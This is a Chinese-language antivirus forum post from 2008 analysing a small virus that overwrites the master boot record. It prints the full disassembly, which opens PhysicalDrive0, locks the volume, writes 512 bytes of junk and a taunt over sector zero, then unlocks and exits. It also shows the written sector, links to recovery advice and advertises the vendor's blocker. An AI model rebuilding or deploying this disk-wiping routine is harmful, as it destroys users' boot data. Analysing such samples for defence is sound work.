点饭的百度空间
银牌会员
积分 2315
发帖 2236
注册 2007-11-30
|
#1 I am virus!
00006048 00406048 0 I am virus! Fuck you :-)
00006064 00406064 0 \\.\PHYSICALDRIVE0
打开物理磁盘,然后锁定卷,写磁盘前512字节,解锁关句柄退出
00401000 /$ 81EC 08020000 sub esp,208
00401006 |. 56 push esi
00401007 |. 57 push edi
00401008 |. B9 7F000000 mov ecx,7F
0040100D |. 33C0 xor eax,eax
0040100F |. 8D7C24 11 lea edi,dword ptr ss:[esp+11]
00401013 |. 6A 00 push 0 ; /hTemplateFile = NULL
00401015 |. F3:AB rep stos dword ptr es:[edi] ; |
00401017 |. 66:AB stos word ptr es:[edi] ; |
00401019 |. 6A 00 push 0 ; |Attributes = 0
0040101B |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
0040101D |. AA stos byte ptr es:[edi] ; |
0040101E |. 6A 00 push 0 ; |pSecurity = NULL
00401020 |. B9 0C000000 mov ecx,0C ; |
00401025 |. BE 30604000 mov esi,virus.00406030 ; |
0040102A |. 8D7C24 20 lea edi,dword ptr ss:[esp+20] ; |
0040102E |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401030 |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00401035 |. F3:A5 rep movs dword ptr es:[edi],dword ptr ds:[esi] ; |
00401037 |. 68 64604000 push virus.00406064 ; |FileName = "\\.\PHYSICALDRIVE0"
0040103C |. C68424 2A020000 >mov byte ptr ss:[esp+22A],55 ; |
00401044 |. C68424 2B020000 >mov byte ptr ss:[esp+22B],0AA ; |
0040104C |. FF15 10504000 call dword ptr ds:[<&KERNEL32.CreateFileA>] ; \CreateFileA
00401052 |. 8BF0 mov esi,eax
00401054 |. 83FE FF cmp esi,-1
00401057 |. 75 0D jnz short virus.00401066
00401059 |. 5F pop edi
0040105A |. 0BC0 or eax,eax
0040105C |. 5E pop esi
0040105D |. 81C4 08020000 add esp,208
00401063 |. C2 1000 retn 10
00401066 |> 8D4424 08 lea eax,dword ptr ss:[esp+8]
0040106A |. 8B3D 0C504000 mov edi,dword ptr ds:[<&KERNEL32.DeviceIoControl>] ; kernel32.DeviceIoControl
00401070 |. 6A 00 push 0 ; /pOverlapped = NULL
00401072 |. 50 push eax ; |pBytesReturned
00401073 |. 6A 00 push 0 ; |OutBufferSize = 0
00401075 |. 6A 00 push 0 ; |OutBuffer = NULL
00401077 |. 6A 00 push 0 ; |InBufferSize = 0
00401079 |. 6A 00 push 0 ; |InBuffer = NULL
0040107B |. 68 18000900 push 90018 ; |IoControlCode = FSCTL_LOCK_VOLUME
00401080 |. 56 push esi ; |hDevice
00401081 |. FFD7 call edi ; \DeviceIoControl
00401083 |. 8D4C24 0C lea ecx,dword ptr ss:[esp+C]
00401087 |. 6A 00 push 0 ; /pOverlapped = NULL
00401089 |. 51 push ecx ; |pBytesWritten
0040108A |. 8D5424 18 lea edx,dword ptr ss:[esp+18] ; |
0040108E |. 68 00020000 push 200 ; |nBytesToWrite = 200 (512.)
00401093 |. 52 push edx ; |Buffer
00401094 |. 56 push esi ; |hFile
00401095 |. FF15 08504000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile
0040109B |. 8D4424 08 lea eax,dword ptr ss:[esp+8]
0040109F |. 6A 00 push 0 ; /pOverlapped = NULL
004010A1 |. 50 push eax ; |pBytesReturned
004010A2 |. 6A 00 push 0 ; |OutBufferSize = 0
004010A4 |. 6A 00 push 0 ; |OutBuffer = NULL
004010A6 |. 6A 00 push 0 ; |InBufferSize = 0
004010A8 |. 6A 00 push 0 ; |InBuffer = NULL
004010AA |. 68 1C000900 push 9001C ; |IoControlCode = FSCTL_UNLOCK_VOLUME
004010AF |. 56 push esi ; |hDevice
004010B0 |. FFD7 call edi ; \DeviceIoControl
004010B2 |. 56 push esi ; /hObject
004010B3 |. FF15 04504000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
004010B9 |. 6A FF push -1 ; /ExitCode = FFFFFFFF
004010BB \. FF15 00504000 call dword ptr ds:[<&KERNEL32.ExitProcess>] ; \ExitProcess
写入引导扇区的内容
0012FD38 ?.??|?.? ?.? ?恂I am virus! Fuck you :-)................
0012FD78 ................................................................
0012FDB8 ................................................................
0012FDF8 ................................................................
0012FE38 ................................................................
0012FE78 ................................................................
0012FEB8 ................................................................
0012FEF8 ..............................................................U
解决方法见:论坛内《揭开数据恢复的神秘面纱》一文
顺便打个广告,微点可以成功拦截此类主引导病毒,拦截后扇区不会有任何变化
BY:unknown tycoon
对于未使用微点主动防御软件的用户,建议尽快将您的杀毒软件特征库升级到最新版本进行查杀
[ Last edited by 点饭的百度空间 on 2008-3-29 at 18:01 ]
| |
※ ※ ※ 本文纯属【点饭的百度空间】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
你的微笑 is 微点的骄傲!
http://hi.baidu.com/new/micropoint |
|
|
